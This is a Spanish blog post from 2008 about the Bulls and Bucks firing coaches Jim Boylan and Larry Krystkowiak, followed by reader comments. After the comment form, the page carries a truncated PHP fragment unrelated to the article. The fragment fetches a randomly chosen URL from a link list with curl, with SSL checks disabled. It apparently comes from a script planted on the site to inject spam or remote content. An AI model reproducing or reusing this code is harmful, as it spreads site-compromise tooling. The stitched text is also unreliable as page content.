Comienza el baile de banquillos

17 de April de 2008 por Gallis

No han pasado ni 24 horas desde el final de la Regular Season y mientras 16 equipos están centrados, con más o menos esperanzas, en los Playoffs que comienzan este sábado, el resto comenzó anoche a pensar ya en la temporada 2008/2009. Algunos de ellos, pese a quedarse fuera de esta fase final, han cumplido sus expectativas y confían en reforzarse este próximo verano. Otros esperan el próximo draft como agua de mayo para hacerse con los servicios de un jugador que vuelva a ilusionar a su afición. Y otros equipos se siguen preguntando cómo es posible que las vacaciones hayan llegado tan pronto. Este es el caso de 2 equipos de la conferencia este, Chicago Bulls y Milwaukee Bucks que, desde hoy, buscan nuevo entrenador. Y es que hoy hemos conocido que Jim Boylan y Larry Krystkowiak han vuelto a hacer bueno aquello de que, en cualquier deporte de equipo, es más fácil echar a un entrenador que a 15 jugadores.

 

 

Tras unos meses en el banquillo de forma interina, Jim Boylan ha dejado hoy de ser entrenador de los Bulls, un equipo que ha sido, con permiso de los Heat de Miami, la gran decepción de la temporada. Los 6 veces campeones de la NBA partían en el mes de noviembre con la vitola de ser uno de los pocos equipos capaces de hablar de tú a tú con los Celtics, pero desde el principio se vió que la cosa no funcionaba. Cuando apenas había transcurrido un mes y medio de competición, Scott Skiles fue cesado como entrenador y su puesto lo ocupó Jim Boylan. Pese a las dudas iniciales, Boylan ha aguantado el resto de la temporada en el banquillo, pero los resultados no han sido buenos. Los Bulls acaban el año undécimos del este, con un balance de 33 victorias y 49 derrotas. Curiosamente, el inverso de la pasada temporada, en la que ganaron 49 partidos y tan solo perdieron 33. Esta es la primera decisión que Paxson tendrá que tomar en una pretemporada que se antoja movida en Chicago. Renovaciones, elecciones de draft y traspasos aparte, comienza la busqueda de un nuevo entrenador, trabajo para el que parece muy bien colocado Rick Carlise.

Carlise también suena para el otro banquillo que desde hoy busca nuevo inquilino. Apenas una semana después de ocupar su cargo como General Manager de los Bucks, John Hammond ha tomado su primera decisión, despedir al entrenador Larry Krystkowiak. Los cerveceros han acabado la temporada últimos de la división central y tan solo han sido capaces de ganar 26 partidos. 56 derrotas se antojan demasiadas para un equipo que, sobre el papel, debería haber hecho más en una conferencia este en la que los Playoffs están más baratos que nunca. Si Rick Carlise acaba finalmente en Chicago, un ex de los Bulls, Scott Skiles, podría acabar en el banquillo de los Bucks.

De momento, estas son las noticias confirmadas, pero parece claro que los banquillos de la NBA van a dar más noticias en los próximos días. Y es que parece cuestión de horas que Donnie Walsh anuncie el despido de Isiah Thomas como entrenador de los Knicks, un puesto para el que suenan Mark Jackson y los ya mencionados Rick Carlise y Scott Skiles. Más dudas generan el futuro de 2 de los mejores entrenadores de la historia. Pat Riley baraja muy seriamente la retirada después de una temporada absolutamente decepcionante de los Heat, solo aliviada por la noticia de su ingreso en el Hall of Fame. Riley ya estuvo a punto de retirarse en 2006, tras ganar el anillo de la mano de Wade y Shaq. Veremos. Mientras, Don Nelson ha vuelto a sembrar dudas sobre su continuidad en los banquillos, como ya hiciera el año pasado. Pese a haberse quedado fuera de los Playoffs, muy pocos discuten su trabajo en la bahía de Oakland. Falta saber si su edad o su motivación no son obstaculo para que podamos seguir disfrutando de su baloncesto.

Ajenos a todo esto, Doc Rivers y Phil Jackson han sido nombrados entrenadores del mes de abril. Un refrendo del buen trabajo de ambos equipos, que les ha llevado al primer puesto de sus respectivas conferencias.

Comenta

4 comentarios a esta entrada

  1. xapa_croack dice:
    #1

    Lo habrás pasado mal para escribir el apellido del entrenador cesado en los bucks, ¿no?

      Citar

  2. TheDeerHunter dice:
    #2

    Y del primero que tenía que haber caído (Isiah) ¿no se sabe nada todavía???

    hay que vel

      Citar

  3. txusma dice:
    #3

    Como aguanta Isiah…

    A lo mejor no se han acabado los movimientos en Bulls y Bucks con el cese de los entrenadores… Buscaran los Bucks un movimiento para traerse un autentico jugador franquicia (ahora q Redd se ha demostrado q no lo es). Material tienen de sobra…

      Citar

  4. Gallis dice:
    #4

    No te creas, Xapa…cortar y pegar 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>